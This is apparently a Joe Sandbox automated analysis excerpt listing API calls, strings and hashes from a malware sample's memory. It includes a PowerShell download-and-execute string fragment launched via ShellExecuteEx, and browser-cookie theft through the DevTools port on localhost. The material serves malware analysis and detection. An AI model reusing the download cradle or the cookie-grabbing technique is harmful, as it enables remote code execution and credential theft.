                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen
                        • String ID: f
                        • API String ID: 2762123234-1993550816
                        • Opcode ID: 6c32dc3611acdb729c43e66eeb5734396170d8f5a0c43ec185547ddcaa1b9afe
                        • Instruction ID: 3b98b8fee8b08e2680d1e2eb510874e3caebf7c354221d2cd410296cb60b066e
                        • Opcode Fuzzy Hash: 6c32dc3611acdb729c43e66eeb5734396170d8f5a0c43ec185547ddcaa1b9afe
                        • Instruction Fuzzy Hash: 5AB1B230A101169BDB22EF74CD496AFB3B6AF04306F44052ABC05A7352DB78DD58CBA9
                        APIs
                        • LoadLibraryA.KERNEL32(ws2_32.dll,?,004572A4), ref: 004647E6
                        • GetProcAddress.KERNEL32(00000000,connect), ref: 004647FC
                        • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0046480D
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0046481E
                        • GetProcAddress.KERNEL32(00000000,htons), ref: 0046482F
                        • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00464840
                        • GetProcAddress.KERNEL32(00000000,recv), ref: 00464851
                        • GetProcAddress.KERNEL32(00000000,socket), ref: 00464862
                        • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00464873
                        • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00464884
                        • GetProcAddress.KERNEL32(00000000,send), ref: 00464895
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                        • API String ID: 2238633743-3087812094
                        • Opcode ID: 16c1ead5e4bcf3e0d24f6db64e3fa23a31f1c8f245da1c2d9e414a0139f92a12
                        • Instruction ID: 4397553f777064f89d6d7fe8c4c8305caf1deed46715ad793bf221b518147af5
                        • Opcode Fuzzy Hash: 16c1ead5e4bcf3e0d24f6db64e3fa23a31f1c8f245da1c2d9e414a0139f92a12
                        • Instruction Fuzzy Hash: 7C11E271DE1710AF87189F74AC0DB993AFAFA0670A364691BF05DD7160DBF84480DB64
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045BE53
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045BE86
                        • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0045BE91
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045BEB1
                        • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0045BEBD
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045BEE0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0045BEEB
                        • lstrlen.KERNEL32(')"), ref: 0045BEF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045BF13
                        • lstrcat.KERNEL32(00000000,')"), ref: 0045BF1F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045BF46
                        • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0045BF66
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045BF88
                        • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0045BF94
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045BFBA
                        • ShellExecuteEx.SHELL32(?), ref: 0045C00C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 4016326548-898575020
                        • Opcode ID: bfd26c14a3f312be1332fd1d0260c22af12d81b14cd0c9d0f8abce6204bef9da
                        • Instruction ID: c6a12710bf2c43f213bfced6bf5015f792c717651b4aa48b8feffeac49167452
                        • Opcode Fuzzy Hash: bfd26c14a3f312be1332fd1d0260c22af12d81b14cd0c9d0f8abce6204bef9da
                        • Instruction Fuzzy Hash: E761D731A10205AFDB11AFB58D896AFBBA5EF04305F44542BFC09E3352DB7CC8458BA9
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0046184F
                        • lstrlen.KERNEL32(015772C8), ref: 00461860
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461887
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00461892
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004618C1
                        • lstrlen.KERNEL32(00474FA0), ref: 004618D3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004618F4
                        • lstrcat.KERNEL32(00000000,00474FA0), ref: 00461900
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0046192F
                        • lstrlen.KERNEL32(01577398), ref: 00461945
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0046196C
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00461977
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004619A6
                        • lstrlen.KERNEL32(00474FA0), ref: 004619B8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004619D9
                        • lstrcat.KERNEL32(00000000,00474FA0), ref: 004619E5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461A14
                        • lstrlen.KERNEL32(015773A8), ref: 00461A2A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461A51
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00461A5C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461A8B
                        • lstrlen.KERNEL32(015773C8), ref: 00461AA1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461AC8
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00461AD3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461B02
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen
                        • String ID:
                        • API String ID: 1049500425-0
                        • Opcode ID: d1bbb898f86867554aef1eccf5807a906dd7dc260a65cd096ba2cdfefa4cbec0
                        • Instruction ID: bd33897a7699488d996f1c08ca1d64e9c3e4a4368df7555aa3e8687413cd542e
                        • Opcode Fuzzy Hash: d1bbb898f86867554aef1eccf5807a906dd7dc260a65cd096ba2cdfefa4cbec0
                        • Instruction Fuzzy Hash: 279133B06017039FD720AFB5DD88A17B7E9AF04344B58582EB886D3361EB78DC45CB65
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00454793
                        • LocalAlloc.KERNEL32(00000040,?), ref: 004547C5
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00454812
                        • lstrlen.KERNEL32(00474B60), ref: 0045481D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045483A
                        • lstrcat.KERNEL32(00000000,00474B60), ref: 00454846
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045486B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454898
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004548A3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004548CA
                        • StrStrA.SHLWAPI(?,00000000), ref: 004548DC
                        • lstrlen.KERNEL32(?), ref: 004548F0
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00454931
                        • lstrcpy.KERNEL32(00000000,?), ref: 004549B8
                        • lstrcpy.KERNEL32(00000000,?), ref: 004549E1
                        • lstrcpy.KERNEL32(00000000,?), ref: 00454A0A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00454A30
                        • lstrcpy.KERNEL32(00000000,?), ref: 00454A5D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 4107348322-3310892237
                        • Opcode ID: d0ac37295b8a347a0f1fb99effb84720de4233bbe7313aec39d08e07434f3c1f
                        • Instruction ID: 5f8b699611df854adccd509e87036c39b5782d3dea1d16d68acb34c2bb376ccb
                        • Opcode Fuzzy Hash: d0ac37295b8a347a0f1fb99effb84720de4233bbe7313aec39d08e07434f3c1f
                        • Instruction Fuzzy Hash: 75B11471A102069BDB25FF75D9859AF77B5AF84309F40002EFC45AB312DB78EC458BA8
                        APIs
                          • Part of subcall function 004490C0: InternetOpenA.WININET(0046CFEC,00000001,00000000,00000000,00000000), ref: 004490DF
                          • Part of subcall function 004490C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004490FC
                          • Part of subcall function 004490C0: InternetCloseHandle.WININET(00000000), ref: 00449109
                        • strlen.MSVCRT ref: 004492E1
                        • strlen.MSVCRT ref: 004492FA
                          • Part of subcall function 00448980: std::_Xinvalid_argument.LIBCPMT ref: 00448996
                        • strlen.MSVCRT ref: 00449399
                        • strlen.MSVCRT ref: 004493E6
                        • lstrcat.KERNEL32(?,cookies), ref: 00449547
                        • lstrcat.KERNEL32(?,00471794), ref: 00449559
                        • lstrcat.KERNEL32(?,?), ref: 0044956A
                        • lstrcat.KERNEL32(?,00474B98), ref: 0044957C
                        • lstrcat.KERNEL32(?,?), ref: 0044958D
                        • lstrcat.KERNEL32(?,.txt), ref: 0044959F
                        • lstrlen.KERNEL32(?), ref: 004495B6
                        • lstrlen.KERNEL32(?), ref: 004495DB
                        • lstrcpy.KERNEL32(00000000,?), ref: 00449614
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                        • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                        • API String ID: 1201316467-3542011879
                        • Opcode ID: 78daebb7d9ede21859dab446a2bcb4aa21ca364f6a251a5453359785861c8042
                        • Instruction ID: ac1ede7a359b854376a3baf2aefad08a65fc48954f87301bfcc7baf530a08102
                        • Opcode Fuzzy Hash: 78daebb7d9ede21859dab446a2bcb4aa21ca364f6a251a5453359785861c8042
                        • Instruction Fuzzy Hash: 3FE13971E10218EBEF14DFA8D980ADEBBB5BF48304F10446AE909A7341DB78AE45CF55
                        APIs
                        • memset.MSVCRT ref: 0045D9A1
                        • memset.MSVCRT ref: 0045D9B3
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0045D9DB
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045DA0E
                        • lstrcat.KERNEL32(?,00000000), ref: 0045DA1C
                        • lstrcat.KERNEL32(?,0158E508), ref: 0045DA36
                        • lstrcat.KERNEL32(?,?), ref: 0045DA4A
                        • lstrcat.KERNEL32(?,0158D460), ref: 0045DA5E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045DA8E
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0045DA95
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045DAFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 2367105040-0
                        • Opcode ID: 183da4f70f735e2bc719b358ee78a4c25992fe0494addbac9df8ab5a3dfa10dc
                        • Instruction ID: 13ae8eb2e0264fc1b0608eb33432953e31ca0b61c58706ca2612278c2ad3d80a
                        • Opcode Fuzzy Hash: 183da4f70f735e2bc719b358ee78a4c25992fe0494addbac9df8ab5a3dfa10dc
                        • Instruction Fuzzy Hash: DEB1A271D102199FDB24EF74DC849EFB7B9AF48304F14456AF909A3351DA389E88CB64
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044B330
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B37E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B3A9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044B3B1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B3D9
                        • lstrlen.KERNEL32(00474C50), ref: 0044B450
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B474
                        • lstrcat.KERNEL32(00000000,00474C50), ref: 0044B480
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B4A9
                        • lstrlen.KERNEL32(00000000), ref: 0044B52D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B557
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044B55F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B587
                        • lstrlen.KERNEL32(00474AD4), ref: 0044B5FE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B622
                        • lstrcat.KERNEL32(00000000,00474AD4), ref: 0044B62E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B65E
                        • lstrlen.KERNEL32(?), ref: 0044B767
                        • lstrlen.KERNEL32(?), ref: 0044B776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044B79E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID:
                        • API String ID: 2500673778-0
                        • Opcode ID: f4a19773d70ce341220c539de1bc9246eba4c2fbc230e16d219d1406f0c4389c
                        • Instruction ID: 629a887e51fe67aec3334fc778e903e3218ed4a7dc4b5b0b49812ce3610709bd
                        • Opcode Fuzzy Hash: f4a19773d70ce341220c539de1bc9246eba4c2fbc230e16d219d1406f0c4389c
                        • Instruction Fuzzy Hash: 0E026F30A012059FEB25DF65D989A6BB7F1EF44308F19806EE8099B361D779DC82CBD4
                        APIs
                          • Part of subcall function 004671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004671FE
                        • RegOpenKeyExA.ADVAPI32(?,0158B6D8,00000000,00020019,?), ref: 004637BD
                        • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004637F7
                        • wsprintfA.USER32 ref: 00463822
                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00463840
                        • RegCloseKey.ADVAPI32(?), ref: 0046384E
                        • RegCloseKey.ADVAPI32(?), ref: 00463858
                        • RegQueryValueExA.ADVAPI32(?,0158E178,00000000,000F003F,?,?), ref: 004638A1
                        • lstrlen.KERNEL32(?), ref: 004638B6
                        • RegQueryValueExA.ADVAPI32(?,0158E1F0,00000000,000F003F,?,00000400), ref: 00463927
                        • RegCloseKey.ADVAPI32(?), ref: 00463972
                        • RegCloseKey.ADVAPI32(?), ref: 00463989
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 13140697-3278919252
                        • Opcode ID: 8ad70563870b65e002eb883ee080bcbbcf3cd0a4c700299452ce589fa716aadb
                        • Instruction ID: d7a5c6fc1ebed38bc2b7f3e37cfe980e00ba34a739ac17d276362b170350bd64
                        • Opcode Fuzzy Hash: 8ad70563870b65e002eb883ee080bcbbcf3cd0a4c700299452ce589fa716aadb
                        • Instruction Fuzzy Hash: EA91BEB29002489FCB14DF94CD849EEB7B9FB48314F14816EE509A7311E739AE85CFA5
                        APIs
                        • InternetOpenA.WININET(0046CFEC,00000001,00000000,00000000,00000000), ref: 004490DF
